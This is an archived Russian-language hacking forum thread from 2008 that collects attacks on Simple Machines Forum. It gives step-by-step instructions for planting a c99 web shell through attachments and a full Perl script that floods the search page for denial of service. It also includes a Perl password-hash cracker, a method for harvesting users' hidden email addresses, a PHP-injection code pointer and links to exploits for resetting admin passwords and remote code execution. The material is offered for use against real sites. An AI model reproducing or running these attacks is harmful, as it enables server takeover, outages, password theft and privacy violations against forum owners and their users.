ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
SMForum audio Captcha Breaking |

16.07.2008, 00:16
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме: 1301036
Репутация:
1334
|
|
SMForum audio Captcha Breaking
Сообщение от Sharingan
что можно сделать с пропатченой 1.1.2?
.спасибо
Существует уязвимость из-за слабой реализации звуковой капчи. В этом движке звуковая капча реализуется посредством посылания браузеру
звукового фала в формате WAV, файл создается путем склеивания произвольным
образом нескольких файлов с разными звуками, и служит преградой от
автоматической регистрации новых пользователей.
разработчики включили рандомизацию выходящего WAV файла в
скрипте /Sources/Subs-Sound.php но она явно недостаточна, и легко обходится
перебором байтов по заданным шаблонам звуков
Код:
[blah@localhost smfh]$ ./captcha.pl http://localhost/smf/
nnrbv
created in 1.41827201843262 seconds
[andrey@localhost smfh]$ ./captcha.pl http://localhost/smf/
vpubu
created in 1.49515509605408 seconds
[andrey@localhost smfh]$ ./captcha.pl http://localhost/smf/
ntfhh
created in 2.31928586959839 seconds
[andrey@localhost smfh]$ ./captcha.pl http://localhost/smf/
egudz
created in 0.823321104049683 seconds
как видно перебор составляет всего одну - две секунды. Так же, существует возможность выполнения произвольного PHP кода при создании или
редактировании сообщения форума.
Последний раз редактировалось Elekt; 03.09.2008 в 03:22..
|
|
|
SMF Upload Shell in Attachment |

23.07.2008, 14:05
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме: 5149122
Репутация:
2438
|
|
SMF Upload Shell in Attachment
В старых версиях SMF /attachments не закрыт через .htaccess (или если не настроен mod_rewrite апача)
1) Если шифрование имени файла отключено, то:
берем шелл(я пользовался с99) и переиминовываем его в c99.php.zip
(не ложим в архив,а просто переиминовываем)
Теперь загружаем его как аттачмент в любом посте
Шелл искать в:
Код:
http://[target]/[path]/attachments/c99.php.zip
2) Из админки.
Идем в:
Forum->Attachments and Avatars
Добавляем php:
Allowed attachment extensions: jpg,php
Отключаем шифрование имени:
Encrypt stored filenames: [ ]
Далее аналогично 1) за исключением переименования.
Последний раз редактировалось Elekt; 03.09.2008 в 04:41..
|
|
|
smf 1.1.2-1.1.3 php injection |

23.07.2008, 19:24
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме: 4646474
Репутация:
1424
|
|
smf 1.1.2-1.1.3 php injection
Да, да это я про :
2. PHP injection
There is a possibility to execute any PHP code during creation or
editing of forum message.
(no further details is given by advisory author).
в общем времени достаточно прошло чтобы все было уже пропатчено , так что выкладывается в паблик )
файлик Sources/Subs-Post.php
PHP код:
// Make sure all tags are lowercase.
$parts[$i] = preg_replace('~\[([/]?)(list|li|table|tr|td)([^\]]*)\]~e', '"[$1" . strtolower("$2") . "$3]"', $parts[$i]);
Последний раз редактировалось ShAnKaR; 12.08.2008 в 18:11..
|
|
|

24.07.2008, 11:08
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме: 5149122
Репутация:
2438
|
|
SMF 1.1.4 Search DOS
Код:
#!/usr/bin/perl
use IO::Socket;
print q{
.____ ________ .__ ________________
| | \_____ \__ __ ____ | | / _____/ __ \
| | _(__ < \/ // __ \| | ______ / __ \\____ /
| |___ / \ /\ ___/| |__ /_____/ \ |__\ \ / /
|_______ \/______ /\_/ \___ >____/ \_____ / /____/
\/ \/ \/ \/
_______ _______ _______ ______ _______ _______
( ____ \( )( ____ \ ( __ \ ( ___ )( ____ \
| ( \/| () () || ( \/ | ( \ )| ( ) || ( \/
| (_____ | || || || (__ | | ) || | | || (_____
(_____ )| |(_)| || __) | | | || | | |(_____ )
) || | | || ( | | ) || | | | ) |
/\____) || ) ( || ) | (__/ )| (___) |/\____) |
\_______)|/ \||/ (______/ (_______)\_______)
/**********************************************************\
| SMF 1.1.4 Search DOS |
| |Petros| |
| www.fallen-empires.com |
| www.l3vel-69.net |
\**********************************************************/
};
$rand=rand(10);
print "Forum Host: ";
$serv = <stdin>;
chop ($serv);
print "Path To Search2: ";
$path = <stdin>;
chop ($path);
print "Times To Search: ";
$times = <stdin>;
chop ($times);
for ($i=0; $i<$times; $i++)
{
$quiry="l3vel69-".$rand.$i;
$form = "search=1234567899876544321&submit=Search&advanced=0";
$len = length $form;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Can't Connect Host, it may be ddos'ed already.";
print $get1 "POST ".$path." HTTP/1.0\n";
print $get1 "Host: ".$serv."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$len."\n\n";
print $get1 $form;
syswrite STDOUT, "69";
}
print "Forum should be Dosed. Check it out...if not use a higher search\n";
|
|
|
SMF 1.1.5 Password Cracker |

25.07.2008, 13:01
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
SMF 1.1.5 Password Cracker
Код:
#!/usr/bin/perl
#
# Simple Machines Forum v1.1.4/v1.1.5 password hash cracker
# not some hack tool you kid.
# Quickly coded, feel free to improve
#
# Iron
# http://www.randombase.com
# or better: http://www.perlforums.org
#
use Digest::SHA1 'sha1_hex';
print "
Simple Machines Forum v1.1.4/v1.1.5 password hash cracker
by Iron - http://www.randombase.com / http://www.perlforums.org
Menu..
1. Numeric attack
2. Alphabetic attack or whatever
3. Mix 'em up Johnny
4. Dictionary attack
< Choice > ";
chomp($c=<stdin>);
print "[+]Username of the target: ";
chomp($u=lc(<stdin>));
print "[+]Password hash of the target: ";
chomp($p=<stdin>);
print "[+]Cracking... could take a while";
if($c eq '1')
{
numeric();
}
elsif($c eq '2')
{
alpha();
}
elsif($c eq '3')
{
mix();
}
elsif($c eq '4')
{
dict();
}
sub numeric
{
$i = 0;
while(sha1_hex($u.$i) ne $p){$i++;}
print "\n[+]Sweet! Found the password: ".$i;
}
sub alpha
{
for($i = "a";$i ne "zzzzzzz" && sha1_hex($u.$i) ne $p;$i++){}
print "\n[+]Sweet! Found the password: ".$i;
}
sub mix
{
print "Not finished. Yet.";
}
sub dict # needs some cleaning to make it faster
{
print "\n[+]I'll need a dictionary though, care to give its filename? ";
chomp($dict=<stdin>);
open(d,"<".$dict);
$found = 0;
while(($line = <d>))
{
chomp($line);
if(sha1_hex($u.$line) eq $p)
{
print "[+]Sweet! Found the password: ".$line;
$found = 1; next;
}
}
if(!$found)
{
print "[-]Not sweet. I couldn't find the password in your dictionary.";
}
}
|
|
|
Узнаем мыло пользователя Smf (любая версия) через Rss |

09.08.2008, 18:17
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Узнаем мыло пользователя Smf (любая версия) через Rss
Узнаем мыло пользователя SMF (любая версия) через RSS
Вот нашел небольшой баг в SMF, позволяющий узнать мыльник юзера SMF. Например ты смотришь профайл какого-то юзера, и видишь: E-mail: скрытый. Так вот, ты можешь узнать его мыло!
Для чего это надо?
Это уже в ваших целях.
Итак, начнем. Качаем любой браузер, который поддерживает чтение RSS новостей; я использую Opera. Переходим на наш форум, и видим в строке адреса:
Нас интересует то, что возле стрелки. Это и есть подписка на новости. Т.е. если на форуме кто-то напишет сообщение, оно сразу же появиться в меню "Каналы новостей".
После нажатия на значок RSS, ждем порядка 10 секунд, и видим:
Жмем "Да". Видим, у нас появилась меню "Каналы новостей", кликаем по нему, выбираем название форума. Все, теперь осталось только ждать, когда кто-то напишет сообщение.
Написал? - Можете радоваться. Видим это:
Вот и все, ребята. Используйте мыло в своих целях.
PS: Прошу строго не судить, так как эт мое первое творение.
Последний раз редактировалось mailbrush; 09.08.2008 в 18:21..
|
|
|
Криптографическая атака на Smf |

01.09.2008, 20:17
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме: 4839935
Репутация:
1202
|
|
Криптографическая атака на Smf
Криптографическая атака на SMF
Заслуживает внимания.
_http://forum.antichat.ru/thread81052.html
Последний раз редактировалось Elekt; 02.09.2008 в 06:25..
|
|
|
Simple Machines Forum <= 1.1.5 Admin Reset Password Exploit (win32) |

07.09.2008, 12:57
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
Simple Machines Forum <= 1.1.5 Admin Reset Password Exploit (win32)
Смена пароля любого пользователя в SMF <=1.1.5
Обнаружил уязвимость, которая позволяет сменить пароль любому пользователю форума, в том числе администратору, через систему восстановления пароля, не имея доступа к почтовому ящику атакуемого пользователя. Она возможна благодаря предсказуемости кода подтверждения для смены пароля, который генерируется с помощью функции rand().
Уязвимость актуальна, если веб-приложение установлено на платформе win32.
http://milw0rm.com/exploits/6392
|
|
|

05.10.2008, 11:18
|
|
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме: 5302668
Репутация:
2054
|
|
http://milw0rm.com/exploits/6665
Name: SMF 1.1.6 Filter Post Bypass
Author: WHK
WebSite: http://www.jccharry.com/
en{
The data in a post are not filtered properly when someone enters
statements BBCode wrong without content that a user can enter
words banned by the system of restrictions by allowing expose
SPAM content, and so on.
}
es{
Los datos en un post no son filtrados adecuadamente cuando alguien
ingresa declaraciones bbcode sin contenido probocando que un
usuario pueda ingresar palabras prohibidas por el sistema de
restricciones permitiendo exponer contenido SPAM, etc.
}
Example of a post / Ejemplo de un post:
------------------------------------------------------------------
[*color=red][*size=20pt]Fu[*url][*/url]ck you admin![*/size][*/color]
My SPAM: [*b]ht[*b][*/b]tp://www.jc[*i][*/i]charry.com/[*/b] > 
------------------------------------------------------------------
Demo:
http://www.jccharry.com/archivos_publicos/smf_filter_post_bypass.png
__________________
Лучший способ защиты - это нападение!!!
|
|
|

05.11.2008, 21:59
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
Simple Machines Forum (SMF) 1.1.6 Remote Code Execution Exploit
Автор: Charles FOL
Загрузка gzip-архива с валидным модулем SMF, содержащим шелл, через атачменты форума,
а затем непреднамеренная установка этого модуля администратором с помощью CSRF-уязвимости (тэг [img])
http://real.olympe-network.com/releases/19817
Последний раз редактировалось [Raz0r]; 07.11.2008 в 20:42..
Причина: отформатировал, исправил ссылку - thx to Rashid
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|